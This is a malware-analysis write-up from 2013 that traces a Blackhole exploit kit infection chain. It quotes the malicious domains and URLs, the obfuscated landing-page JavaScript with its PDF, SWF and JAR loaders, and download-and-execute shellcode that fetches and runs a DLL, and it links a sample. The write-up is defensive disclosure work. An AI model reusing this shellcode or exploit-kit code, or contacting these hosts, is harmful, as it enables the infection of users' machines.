A Guide to flush Blackhole payloads (Cridex dropped Fareit case)
27 Jan 2013
Infection of Cridex Trojan dropping Fareit Credential Stealer 2013 Jan 14th
Virus Total:
[Payload] [Landing Page] [SWF1] [SWF2] [PDF1] [PDF2] [JAR1] [JAR2/0day]
Exploit Infector Code Screenshot Pictures:
[SWF1] [SWF2] [PDF1] [PDF2] [JAR1] [JAR2/0day]
Sample Download--->>[MEDIAFIRE]
Guide & Log: (I'm sorry for using texts as report.. Lack of time)
=======================================================
#MalwareMustDie - Infection of Blackhole EK via Spam
Landing page: dekamerionka.ru:8080
IP: 81.31.47.124, 91.224.135.20, 212.112.207.15
A guide to flush the Blackhole Payload & Infectors...
@unixfreaxjp /malware]$ date
Tue Jan 15 23:05:49 JST 2013
=======================================================
Infector urls...
h00p://ideawiz .org/letter.htm
h00p://threesaints .org.uk/letter.htm
h00p://masreptiles.terrarium .pl/letter.htm
//All of the dirty stuff's download urls result:
PD-079 : h00p://dekamerionka .ru:8080/forum/links/column.php
jar : h00p://dekamerionka .ru:8080/forum/links/column.php?cabimab=lij&ymwbck=rpe
payload : h00p://dekamerionka .ru:8080/forum/links/column.php?gf=30:1n:1i:1i:33&oe=2v:1k:1m:32:33:1k:1k:31:1j:1o&a=1k&go=n&kv=l
swf1 : h00p://dekamerionka .ru:8080/forum/links/column.php?cphwe=30:1n:1i:1i:33&tgou=38:3e:31:31:3c&emubvku=2v:1k:1m:32:33:1k:1k:31:1j:1o&zjxsiyt=kxy
swf2 : h00p://dekamerionka .ru:8080/forum/links/column.php?jkmflr=30:1n:1i:1i:33&boqrjhrc=3b:3m:37:3m&rshcr=2v:1k:1m:32:33:1k:1k:31:1j:1o&jfwxwr=gcp
pdf1 : h00p://dekamerionka .ru:8080/forum/links/column.php?cdaa=30:1n:1i:1i:33&nzhwe=3k:3j:3j&feocz=2v:1k:1m:32:33:1k:1k:31:1j:1o&tyq=1k:1d:1f:1d:1g:1d:1f
pdf2 : h00p://dekamerionka .ru:8080/forum/links/column.php?yjjdw=30:1n:1i:1i:33&wjqofll=3c&hqxcfgl=2v:1k:1m:32:33:1k:1k:31:1j:1o&ncd=1k:1d:1f:1d:1g:1d:1f
//infector page access...
--20:26:45-- h00p://threesaints .org.uk/letter.htm
=> `letter.htm'
Resolving threesaints .org.uk... seconds 0.00, 173.254.28.107
Caching threesaints .org.uk => 173.254.28.107
Connecting to threesaints .org.uk|173.254.28.107|:80... seconds 0.00, connected.
:
GET /letter.htm HTTP/1.0
User-Agent: MalwareMustDie Rocks Blackhole Again!
Host: threesaints .org.uk
:
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Date: Tue, 15 Jan 2013 11:26:45 GMT
Server: Apache
Last-Modified: Tue, 15 Jan 2013 11:14:17 GMT
ETag: "4f03efb-1a9-4d351dcda592d"
Accept-Ranges: bytes
Content-Length: 425
Vary: Accept-Encoding
Keep-Alive: timeout=10, max=30
Connection: Keep-Alive
Content-Type: text/html
:
200 OK
Length: 425 [text/html]
"20:26:47 (11.89 MB/s) - letter.htm saved [425/425]"
// was having this codes...
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Please wait</title>
</head>
<body>
<h2><b>Please wait a moment ... You will be forwarded. </h2></b>
<h5>Internet Explorer and Mozilla Firefox compatible only</h5><br>
<script>
var1=49;
var2=var1;
if(var1==var2) {document.location="h00p://dekamerionka.ru:8080/forum/links/column.php";}
</script>
</body>
</html>
-----------------------------------------------------------
"
// forward you to the landing page of BHEK....
"
--20:28:05-- h00p://dekamerionka .ru:8080/forum/links/column.php
=> `column.php
Resolving dekamerionka.ru... seconds 0.00, 81.31.47.124, 91.224.135.20, 212.112.207.15
Caching dekamerionka.ru => 81.31.47.124 91.224.135.20 212.112.207.15
Connecting to dekamerionka.ru|81.31.47.124|:8080... seconds 0.00, connected.
:
GET /forum/links/column .php HTTP/1.0
User-Agent: MalwareMustDie Rocks Blackhole Again!
Host: dekamerionka.ru:8080
:
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Tue, 15 Jan 2013 11:28:04 GMT
Content-Type: text/html; charset=CP-1251
Connection: close
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
:
200 OK
Length: unspecified [text/html]
"20:28:07 (69.85 KB/s) - column.php saved [117566]"
A new obfuscation BHEK landing page..
first time to see this :
<html><head><title></title></head><body>
<applet code="hw" archive="/forum/links/column.php?cabimab=lij&y..
<param name="val" value="Dyy3OjjMeqV0el8toqV..
<param value="" name="prime"
<script>function c(){if(window.document)s+=String.fromCharCode(a..
var a = "!!8:97:!!4:32:80:!08:!!7:!03:!05:!!0:68:!0!:!!6:!0!:99:..
!6:!2!:!!2:!0!:!!!:!02:32:98:6!:6!:34:!02:!!7:!!0:99:!!6:!05:!!!..
98:4!:63:40:!00:46:!05:!!5:68:!0!:!02:!05:!!0:!0!:!00:40:99:4!:6..
3:!20:4!:59:!02:!!!:!!4:40:97:6!:48:59:97:60:77:97:!!6:!04:46:!0..
:48:34:93:4!:59:!02:!!!:!!4:40:97:6!:48:59:97:60:52:59:97:43:43:..
:!!5:93:47:46:!!6:!0!:!!5:!!6:40:!00:9!:98:93:4!:4!:!23:!02:6!:!..
0:97:46:!08:!0!:!!0:!03:!!6:!04:59:!02:43:43:4!:!23:!09:6!:97:9!..
:
...73:!!0:!02:!!!:46:!06:97:!!4:34:4!:59";
a=a.replace(/!/g,1)[sp](":");
for(i=0,s="";i<a.length;i++){
c();
}
z=true;
try{document.createElement("span");}catch(q){z=false;}
if(window.document)if(z)e(s);
</script></body></html>
Landing page structure:
:
// applet
<applet code="hw" archive="/forum/links/column.php? cabimab=lij &ymwbck =rpe">
<param name="val" value="Dyy3OjjMeqV0el8toqVwlKOrfrfj.tlK0j-8oqij%t-K0ow3D3xA.b1fO6oO68O68O11RtebhvO6qO60O1hO11O6qO6qO16O6CO6tRVb6.RAtboRqvb-"/>
<param value="" name="prime" />
</applet>
:
// first script
function c()
{
if(window.document)s+=String.fromCharCode(a「i」);
}
e=eval;
sp="split";
// soon followed by second script+obfuscation data:
var a = "!!8:97:!!4:32:80:!08:!!.....:97:!!4:34:4!:59";
// generator..
a=a.replace(/!/g,1)[sp](":");
for(i=0,s="";i<a.length;i++)
{
c();
}
z=true;
try
{
document.createElement("span");
}
catch(q)
{
z=false;
}
if(window.document)if(z)e(s);
The summary of the infection method used in this landing page.
// From this landing page we will get infections as follows:
"1. The HTML landing page applet will infect you with -
// - first infection of jar (it has the 0day java jar here..)"
<applet code="hw" archive="/forum/links/column .php ? cabimab=lij & ymwbck=rpe">
<param name="val" value="Dyy3OjjMeqV0el8toqVwlKOrfrfj.tlK0j-8oqij%t-K0ow3D3xA.b1fO6oO68O68O11RtebhvO6qO60O1hO11O6qO6qO16O6CO6tRVb6.RAtboRqvb-"/>
<param value="" name="prime" /></applet>
"2. The obfuscation landing page will infect you:
// flash/swf SWF1 exploit....."
function getCN()
{ return "/forum/links/column .php ? cphwe=" + x("c833f") + "&tgou=" + x("kqddo") +
"&emubvku=2v:1k:1m:32:33:1k:1k:31:1j:1o&zjxsiyt=kxy" }
"//pdf1"
function p1(){
var d = document.createElement("object");
d.setAttribute("data", "/forum/links/column.php?cdaa=" + x("c833f") + "&nzhwe=" + x( "wvv") + "&feocz=2v:1k:1m:32:33:1k:1k:31:1j:1o&tyq=" + x(pdfver.join(".")));
d.setAttribute("type", "application/pdf");
document.body.appendChild(d);}
"//pdf2"
function p2(){
var d = document.createElement("object");
d.setAttribute("data", "/forum/links/column.php?yjjdw=" + x("c833f") + "&wjqofll=" + x( "o") + "&hqxcfgl=2v:1k:1m:32:33:1k:1k:31:1j:1o&ncd=" + x(pdfver.join(".")));
d.setAttribute("type", "application/pdf");
document.body.appendChild(d);
}
"//flash/swf SWF2 exploit...."
function ff2(){
var oSpan = document.createElement("span");
var url = "/forum/links/column.php?jkmflr=" + x("c833f") + "&boqrjhrc=" + x("nyjy") + "&rshcr=2v:1k:1m:32:33:1k:1k:31:1j:1o&jfwxwr=gcp";
oSpan.innerHTML = "
<object classid='clsid:d27cdb6e-ae6d -11cf-96b8- 444553540000' width=10 height=10 id='swf_id'>
<param name='movie' value='" + url + "' />
<param name='allowScriptAccess' value='always' />
<param name='Play' value='0' />
<embed src='" + url + "' id='swf_id' name='swf_id' allowScriptAccess='always' type='application/x-shockwave-flash' width='10' height='10'>
</embed></object>
";
document.body.appendChild(oSpan); }
"// a shellcode (to be called by other exploitor as key of payload)"
function getShellCode(){
var a = "8200!%4482!%e551!%e034!%5164!%f474!...!%1414!%".split("").
reverse().join("");
return a["replace"](/\%!/g, "%" + "u") }
"// and a jar component to detect your java version"
$$["onDetec" + "tionDone"]("Ja" + "va", svwrbew6436b, "../data/getJavaInfo .jar");
Shellcode & Payload:
"// change the code into below & see the result of the burped shellcode:"
var a = "8200!%4482!...!%1414!%".split("").reverse().join("");
var xxx=a["replace"](/\%!/g, "%" + "u");
document.write(xxx);
"// output :"
%u4141%u4141%u8366%ufce4%uebfc%u581O%uc931%u8166%uO9e9%u8Ofe%u283O%ue24O%uebfa%ue8O5%uffeb%uffff%uccad
%u1c5d%u77c1%ue81b%ua34c%u1868%u68a3%ua324%u3458%ua37e%u2O5e%uf31b%ua34e%u1476%u5c2b%uO41b%uc6a9%u383d
%ud7d7%ua39O%u1868%u6eeb%u2e11%ud35d%u1caf%uadOc%u5dcc%uc179%u64c3%u7e79%u5da3%ua314%u1d5c%u2b5O%u7edd
%u5ea3%u2bO8%u1bdd%u61e1%ud469%u2b85%u1bed%u27f3%u3896%uda1O%u2O5c%ue3e9%u2b25%u68f2%ud9c3%u3713%uce5d
%ua376%uOc76%uf52b%ua34e%u6324%u6ea5%ud7c4%uOc7c%ua324%u2bfO%ua3f5%ua32c%ued2b%u7683%ueb71%u7bc3%ua385
%uO84O%u55a8%u1b24%u2b5c%uc3be%ua3db%u2O4O%udfa3%u2d42%ucO71%ud7bO%ud7d7%ud1ca%u28cO%u2828%u7O28%u4278
%u4O68%u28d7%u2828%uab78%u31e8%u7d78%uc4a3%u76a3%uab38%u2deb%ucbd7%u474O%u2846%u4O28%u5a5d%u4544%ud77c
%uab3e%u2Oec%ucOa3%u49cO%ud7d7%uc3d7%uc32a%ua95a%u2cc4%u2829%ua528%uOc74%uef24%uOc2c%u4d5a%u5b4f%u6cef
%u2cOc%u5a5e%u1a1b%u6cef%u2OOc%uO5O8%uO85b%u4O7b%u28dO%u2828%u7ed7%ua324%u1bcO%u79e1%u6cef%u2835%u585f
%u5c4a%u6cef%u2d35%u4cO6%u4444%u6cee%u2135%u7128%ue9a2%u182c%u6caO%u2c35%u7969%u2842%u2842%u7f7b%u2842
%u7ed7%uad3c%u5de8%u423e%u7b28%u7ed7%u422c%uab28%u24c3%ud77b%u2c7e%uebab%uc324%uc32a%u6f3b%u17a8%u5d28
%u6fd2%u17a8%u5d28%u42ec%u4228%ud7d6%u2O7e%ub4cO%ud7d6%ua6d7%u2666%ubOc4%ua2d6%ua126%u2947%u1b95%ua2e2
%u3373%u6eee%u1e51%uO732%u4O58%u5c5c%u1258%uO7O7%u4d4c%u4943%u4d45%u415a%u4647%u4943%u5aO6%u125d%u181O
%u181O%u4eO7%u5a47%u455d%u44O7%u4641%u5b43%u4bO7%u4447%u455d%uO646%u4O58%u1758%u4e4f%u1b15%u1218%u4619
%u1912%u1241%u4119%u1b12%uOe1b%u4d47%u1a15%u125e%u4319%u1912%u1245%u1a1b%u1b12%u121b%u4319%u1912%u1243
%u191b%u1912%u1242%u4719%u49Oe%u1915%uOe43%u474f%u4615%u43Oe%u155e%u2844%uOO28
--------------------------------------------------------------------------------
"// #Tips if you want to use libemu to crack this I made the below format for you.."
import pylibemu
shellcode = b"\x41\x41\x41\x41\x83\x66\xfc\xe4\xeb\xfc\x58\x1O\xc9\x31\ x81\x66\xO9\xe9\x8O\xfe\x28\x3O\xe2\x4O\xeb\xfa\xe8\xO5\xff\xeb"
shellcode += b"\xff\xff\xcc\xad\x1c\x5d\x77\xc1\xe8\x1b\xa3\x4c\x18\x68\ x68\xa3\xa3\x24\x34\x58\xa3\x7e\x2O\x5e\xf3\x1b\xa3\x4e\x14\x76"
shellcode += b"\x5c\x2b\xO4\x1b\xc6\xa9\x38\x3d\xd7\xd7\xa3\x9O\x18\x68\ x6e\xeb\x2e\x11\xd3\x5d\x1c\xaf\xad\xOc\x5d\xcc\xc1\x79\x64\xc3"
shellcode += b"\x7e\x79\x5d\xa3\xa3\x14\x1d\x5c\x2b\x5O\x7e\xdd\x5e\xa3\ x2b\xO8\x1b\xdd\x61\xe1\xd4\x69\x2b\x85\x1b\xed\x27\xf3\x38\x96"
shellcode += b"\xda\x1O\x2O\x5c\xe3\xe9\x2b\x25\x68\xf2\xd9\xc3\x37\x13\ xce\x5d\xa3\x76\xOc\x76\xf5\x2b\xa3\x4e\x63\x24\x6e\xa5\xd7\xc4"
shellcode += b"\xOc\x7c\xa3\x24\x2b\xfO\xa3\xf5\xa3\x2c\xed\x2b\x76\x83\ xeb\x71\x7b\xc3\xa3\x85\xO8\x4O\x55\xa8\x1b\x24\x2b\x5c\xc3\xbe"
shellcode += b"\xa3\xdb\x2O\x4O\xdf\xa3\x2d\x42\xcO\x71\xd7\xbO\xd7\xd7\ xd1\xca\x28\xcO\x28\x28\x7O\x28\x42\x78\x4O\x68\x28\xd7\x28\x28"
shellcode += b"\xab\x78\x31\xe8\x7d\x78\xc4\xa3\x76\xa3\xab\x38\x2d\xeb\ xcb\xd7\x47\x4O\x28\x46\x4O\x28\x5a\x5d\x45\x44\xd7\x7c\xab\x3e"
shellcode += b"\x2O\xec\xcO\xa3\x49\xcO\xd7\xd7\xc3\xd7\xc3\x2a\xa9\x5a\ x2c\xc4\x28\x29\xa5\x28\xOc\x74\xef\x24\xOc\x2c\x4d\x5a\x5b\x4f"
shellcode += b"\x6c\xef\x2c\xOc\x5a\x5e\x1a\x1b\x6c\xef\x2O\xOc\xO5\xO8\ xO8\x5b\x4O\x7b\x28\xdO\x28\x28\x7e\xd7\xa3\x24\x1b\xcO\x79\xe1"
shellcode += b"\x6c\xef\x28\x35\x58\x5f\x5c\x4a\x6c\xef\x2d\x35\x4c\xO6\ x44\x44\x6c\xee\x21\x35\x71\x28\xe9\xa2\x18\x2c\x6c\xaO\x2c\x35"
shellcode += b"\x79\x69\x28\x42\x28\x42\x7f\x7b\x28\x42\x7e\xd7\xad\x3c\ x5d\xe8\x42\x3e\x7b\x28\x7e\xd7\x42\x2c\xab\x28\x24\xc3\xd7\x7b"
shellcode += b"\x2c\x7e\xeb\xab\xc3\x24\xc3\x2a\x6f\x3b\x17\xa8\x5d\x28\ x6f\xd2\x17\xa8\x5d\x28\x42\xec\x42\x28\xd7\xd6\x2O\x7e\xb4\xcO"
shellcode += b"\xd7\xd6\xa6\xd7\x26\x66\xbO\xc4\xa2\xd6\xa1\x26\x29\x47\ x1b\x95\xa2\xe2\x33\x73\x6e\xee\x1e\x51\xO7\x32\x4O\x58\x5c\x5c"
shellcode += b"\x12\x58\xO7\xO7\x4d\x4c\x49\x43\x4d\x45\x41\x5a\x46\x47\ x49\x43\x5a\xO6\x12\x5d\x18\x1O\x18\x1O\x4e\xO7\x5a\x47\x45\x5d"
shellcode += b"\x44\xO7\x46\x41\x5b\x43\x4b\xO7\x44\x47\x45\x5d\xO6\x46\ x4O\x58\x17\x58\x4e\x4f\x1b\x15\x12\x18\x46\x19\x19\x12\x12\x41"
shellcode += b"\x41\x19\x1b\x12\xOe\x1b\x4d\x47\x1a\x15\x12\x5e\x43\x19\ x19\x12\x12\x45\x1a\x1b\x1b\x12\x12\x1b\x43\x19\x19\x12\x12\x43"
shellcode += b"\x19\x1b\x19\x12\x12\x42\x47\x19\x49\xOe\x19\x15\xOe\x43\ x47\x4f\x46\x15\x43\xOe\x15\x5e\x28\x44\xOO\x28"
emulator = pylibemu.Emulator()
offset = emulator.shellcode_getpc_test(shellcode)
offset
emulator.prepare(shellcode, offset)
emulator.test()
print emulator.emu_profile_output
"
----------------------------------------------------------------------------
// my way is...
// sav the binary and disassembly it..
----------------------------------------------------------------------------"
41 41 41 41 66 83 e4 fc fc eb 1O 58 31 c9 66 81 AAAAf......X1.f.
e9 O9 fe 8O 3O 28 4O e2 fa eb O5 e8 eb ff ff ff ....O(@.........
ad cc 5d 1c c1 77 1b e8 4c a3 68 18 a3 68 24 a3 ..]..w..L.h..h$.
58 34 7e a3 5e 2O 1b f3 4e a3 76 14 2b 5c 1b O4 X4~.^...N.v.+\..
a9 c6 3d 38 d7 d7 9O a3 68 18 eb 6e 11 2e 5d d3 ..=8....h..n..].
af 1c Oc ad cc 5d 79 c1 c3 64 79 7e a3 5d 14 a3 .....]y..dy~.]..
5c 1d 5O 2b dd 7e a3 5e O8 2b dd 1b e1 61 69 d4 \.P+.~.^.+...ai.
85 2b ed 1b f3 27 96 38 1O da 5c 2O e9 e3 25 2b .+.....8..\...%+
f2 68 c3 d9 13 37 5d ce 76 a3 76 Oc 2b f5 4e a3 .h...7].v.v.+.N.
24 63 a5 6e c4 d7 7c Oc 24 a3 fO 2b f5 a3 2c a3 $c.n..|.$..+..,.
2b ed 83 76 71 eb c3 7b 85 a3 4O O8 a8 55 24 1b +..vq..{[email protected]$.
5c 2b be c3 db a3 4O 2O a3 df 42 2d 71 cO bO d7 \[email protected]...
d7 d7 ca d1 cO 28 28 28 28 7O 78 42 68 4O d7 28 .....((((pxBh@.(
28 28 78 ab e8 31 78 7d a3 c4 a3 76 38 ab eb 2d ((x..1x}...v8..-
d7 cb 4O 47 46 28 28 4O 5d 5a 44 45 7c d7 3e ab ..@GF((@]ZDE|.>.
ec 2O a3 cO cO 49 d7 d7 d7 c3 2a c3 5a a9 c4 2c .....I....*.Z..,
29 28 28 a5 74 Oc 24 ef 2c Oc 5a 4d 4f 5b ef 6c )((.t.$.,.ZMO[.l
Oc 2c 5e 5a 1b 1a ef 6c Oc 2O O8 O5 5b O8 7b 4O .,^Z...l....[.{@
dO 28 28 28 d7 7e 24 a3 cO 1b e1 79 ef 6c 35 28 .(((.~$....y.l5(
5f 58 4a 5c ef 6c 35 2d O6 4c 44 44 ee 6c 35 21 _XJ\.l5-.LDD.l5!
28 71 a2 e9 2c 18 aO 6c 35 2c 69 79 42 28 42 28 (q..,..l5,iyB(B(
7b 7f 42 28 d7 7e 3c ad e8 5d 3e 42 28 7b d7 7e {.B(.~<..]>B({.~
2c 42 28 ab c3 24 7b d7 7e 2c ab eb 24 c3 2a c3 ,B(..${.~,..$.*.
3b 6f a8 17 28 5d d2 6f a8 17 28 5d ec 42 28 42 ;o..(].o..(].B(B
d6 d7 7e 2O cO b4 d6 d7 d7 a6 66 26 c4 bO d6 a2 ..~.......f&....
26 a1 47 29 95 1b e2 a2 73 33 ee 6e 51 1e 32 O7 &.G)....s3.nQ.2.
58 4O 5c 5c 58 12 O7 O7 4c 4d 43 49 45 4d 5a 41 X@\\X...LMCIEMZA
47 46 43 49 O6 5a 5d 12 1O 18 1O 18 O7 4e 47 5a GFCI.Z]......NGZ
5d 45 O7 44 41 46 43 5b O7 4b 47 44 5d 45 46 O6 ]E.DAFC[.KGD]EF.
58 4O 58 17 4f 4e 15 1b 18 12 19 46 12 19 41 12 [email protected].
19 41 12 1b 1b Oe 47 4d 15 1a 5e 12 19 43 12 19 .A....GM..^..C..
45 12 1b 1a 12 1b 1b 12 19 43 12 19 43 12 1b 19 E........C..C...
12 19 42 12 19 47 Oe 49 15 19 43 Oe 4f 47 15 46 ..B..G.I..C.OG.F
Oe 43 5e 15 44 28 28 OO .C^.D((.
-------------------------------------------------------------------"
// see the payload url below in the 0x1a494bbe at urlmon? ↓ "
0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)
0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://dekam erionka .ru : 8080/forum/links/column .php?gf=30:1n:1i:1i:33&oe=2v:1k:1m:32:33:1k:1k:31:1j:1o&a=1k&go=n&kv=l, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0 .dll) 0
0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
"
//payload is here.. "
h00p://dekamerionka .ru:80 80 /forum/links/column .php?g f=30:1n:1i:1i:33&oe=2v:1k:1m:32:33:1k:1k:31:1j:1o&a=1k&go=n&kv=l
"
//download... "
--21:33:38-- h0 0p:/ /dekamerionka .ru: 8080 /forum/links/column .php?gf =30:1n:1i:1i:33&oe=2v:1k:1m:32:33:1k:1k:31:1j:1o&a=1k&go=n&kv=l
=> `column.php@gf=30%3A1n%3A1i%3A1i%3A33&oe=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&a=1k&go=n&kv=l
Resolving dekamerionka.ru... seconds 0.00, 212.112.207.15, 81.31.47.124, 91.224.135.20
Caching dekamerionka.ru => 212.112.207.15 81.31.47.124 91.224.135.20
Connecting to dekamerionka.ru|212.112.207.15|:8080... seconds 0.00, connected.
: "
GET /forum/links/column.php?gf=30:1n:1i:1i:33&oe=2v:1k:1m:32:33:1k:1k:31:1j:1o&a=1k&go=n&kv=l HTTP/1.0 "
User-Agent: MalwareMustDie Rocks Blackhole Again!
Host: dekamerionka.ru:8080
:
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Tue, 15 Jan 2013 12:33:36 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Pragma: public
Expires: Tue, 15 Jan 2013 12:33:37 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private "
Content-Disposition: attachment; filename=calc.exe"
Content-Transfer-Encoding: binary
Content-Length: 140288
200 OK "
Length: 140,288 (137K) [application/x-msdownload]
100%[====================================>] 140,288 64.83K/s
21:33:42 (64.73 KB/s) - `calc.exe' saved [140288/140288] "
Getting infector components
:
// let's get the SWF1...
// I prefer to check the obfuscated link in below function:
function getCN(){
return "/forum/links/column .php?cph we=" + x("c833f") + "&tgou=" + x("kqddo") +
"&emubvku=2v:1k:1m:32:33:1k:1k:31:1j:1o&zjxsiyt=kxy" }
// it is using function x, so let's use it too to decode values of url string..
function x(s){
d = [];
for (i = 0; i < s.length; i ++ ){
k = (s.charCodeAt(i)).toString(33);
d.push(k);} ; return d.join(":");}
var xxx= "/forum/links/column. php?c phwe=" + x("c833f") + "&tgou=" + x("kqddo") + "&emubvku=2v:1k:1m:32:33:1k:1k:31:1j:1o&zjxsiyt=kxy";
document.write(xxx);
// result:
/forum/links/colum n.php?c phwe=30:1n:1i:1i:33&tgou=38:3e:31:31:3c&em ubvku=2v:1k:1m:32:33:1k:1k:31:1j:1o&zjxsiyt=kxy
//download it...
h00p://dekamerion ka .ru:8 080/forum/links/column .php?cphw e=30:1n:1i:1i:33&tgou=38:3e:31:31:3c&emubvku=2v:1k:1m:32:33:1k:1k:31:1j:1o&zjxsiyt=kxy
GET /forum/links/column .php?cp hwe=30:1n:1i:1i:33&tgou=38:3e:31:31:3c&emubvku=2v:1k:1m:32:33:1k:1k:31:1j:1o&zjxsiyt=kxy HTTP/1.0
User-Agent: MalwareMustDie Rocks Blackhole Again!
Host: dekamerionka.ru:8080
Connection: Keep-Alive
:
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Tue, 15 Jan 2013 12:50:12 GMT
Content-Type: text/html; charset=CP-1251
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Length: 7238
200 OK
Registered socket 1896 for persistent reuse.
Length: 7,238 (7.1K) [text/html]
100%[====================================>] 7,238 22.73K/s
// Get the SWF2 Infector,..
// same method...
h00p://dekamerionka .ru:8 080/forum/links/column .php?jk mflr=30:1n:1i:1i:33&boqrjhrc=3b:3m:37:3m&rshcr=2v:1k:1m:32:33:1k:1k:31:1j:1o&jfwxwr=gcp
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Tue, 15 Jan 2013 12:51:12 GMT
Content-Type: text/html; charset=CP-1251
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Length: 946
:
200 OK
Registered socket 1896 for persistent reuse.
Length: 946 [text/html]
100%[====================================>] 946 --.--K/s
21:51:14 (26.47 MB/s) - "column .php@jkmflr=30% 3A1n%3A1i%3 A1i%3A33&boqrjhrc=3b%3A3m%3A37%3A3m&rshcr=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&jfwxwr=gcp" saved [946/946]
// Get the PDF 1 & 2 infectors..., w/ understanding value of x(pdfver.join("."))= "1k:1d:1f:1d:1g:1d:1f"
/forum/links/column.php?cdaa=" + x("c833f") + "&nzhwe=" + x( "wvv") + "&feocz=2v:1k:1m:32:33:1k:1k:31:1j:1o&tyq=" + "1k:1d:1f:1d:1g:1d:1f"
/forum/links/column.php?yjjdw=" + x("c833f") + "&wjqofll=" + x( "o") + "&hqxcfgl=2v:1k:1m:32:33:1k:1k:31:1j:1o&ncd=" + "1k:1d:1f:1d:1g:1d:1f"
↓
h00p://dekamerionka.ru:8080/forum/links/column.php?cdaa=30:1n:1i:1i:33&nzhwe=3k:3j:3j&feocz=2v:1k:1m:32:33:1k:1k:31:1j:1o&tyq=1k:1d:1f:1d:1g:1d:1f
h00p://dekamerionka.ru:8080/forum/links/column.php?yjjdw=30:1n:1i:1i:33&wjqofll=3c&hqxcfgl=2v:1k:1m:32:33:1k:1k:31:1j:1o&ncd=1k:1d:1f:1d:1g:1d:1f
// shortly, the download logs..
:
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Tue, 15 Jan 2013 13:05:17 GMT
Content-Type: application/pdf
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Content-Length: 21575
ETag: "18f8a6bcd64232c6eeead1d0a2c5cd62"
Last-Modified: Tue, 15 Jan 2013 13:05:17 GMT
Accept-Ranges: bytes
200 OK
Registered socket 1896 for persistent reuse.
Length: 21,575 (21K) [application/pdf]
100%[====================================>] 21,575 40.09K/s
:
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Tue, 15 Jan 2013 13:05:58 GMT
Content-Type: application/pdf
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Accept-Ranges: bytes
Content-Length: 9781
Content-Disposition: inline; filename=b76cb.pdf
200 OK
Registered socket 1896 for persistent reuse.
Length: 9,781 (9.6K) [application/pdf]
100%[====================================>] 9,781 59.75K/s
// And the JAR...
// see the applet url...
<applet code="hw" archive="/forum/links/column.php?cabimab=lij&ymwbck=rpe">
<param name="val" value="Dyy3OjjMeqV0el8toqVwlKOrfrfj.tlK0j-8oqij%t-K0ow3D3xA.b1fO6oO68O68O11RtebhvO6qO60O1hO11O6qO6qO16O6CO6tRVb6.RAtboRqvb-"/>
<param value="" name="prime" /></applet>
h00p://dekamerionka.ru:8080/forum/links/column.php?cabimab=lij&ymwbck=rpe
:
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Tue, 15 Jan 2013 13:32:09 GMT
Content-Type: text/html; charset=CP-1251
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
:
200 OK
Registered socket 1896 for persistent reuse.
Length: 20 [text/html]
100%[====================================>] 20 --.--K/s
22:27:08 (659.56 KB/s) - `column.php@cabimab=lij&ymwbck=rpe.2' saved [20/20]
// hmm.. the jar looks failed.. :-( Let's re-set the "request" :
// retry - try1 (old java version)
--16:24:19-- h00p://dekamer ionka .ru:80 80/forum/links/column.php?cabimab=lij&ymwbck=rpe
=> "column.php@cabimab=lij&ymwbck=rpe"
Resolving dekamerionka.ru... seconds 0.00, 212.112.207.15, 81.31.47.124, 91.224.135.20
Connecting to dekamerionka.ru|212.112.207.15|:8080... seconds 0.00, connected.
:
GET /forum/links/column.php?cab imab=lij&ymwbck=rpe HTTP/1.0
User-Agent: MalwareMustDie!
Host: dekamerionka.ru:8080
:
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Wed, 16 Jan 2013 07:24:15 GMT
Content-Type: application/java-archive
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Content-Length: 16786
ETag: "e3ffc7e6bc6f654d51dd5bb7658ae853"
Last-Modified: Wed, 16 Jan 2013 07:24:16 GMT
Accept-Ranges: bytes
:
200 OK
Registered socket 1896 for persistent reuse.
Length: 16,786 (16K) [application/java-archive]
"16:24:21 (26.42 KB/s) - `try1.jar' saved [16786/16786]"
// retry - try2 (newer java version)
--17:06:01-- h00p://dekamer ionka.ru:8 080/forum/links/column .php?cabim ab=li j&ym wbck=rpe
=> "column.php@cabimab=lij&ymwbck=rpe"
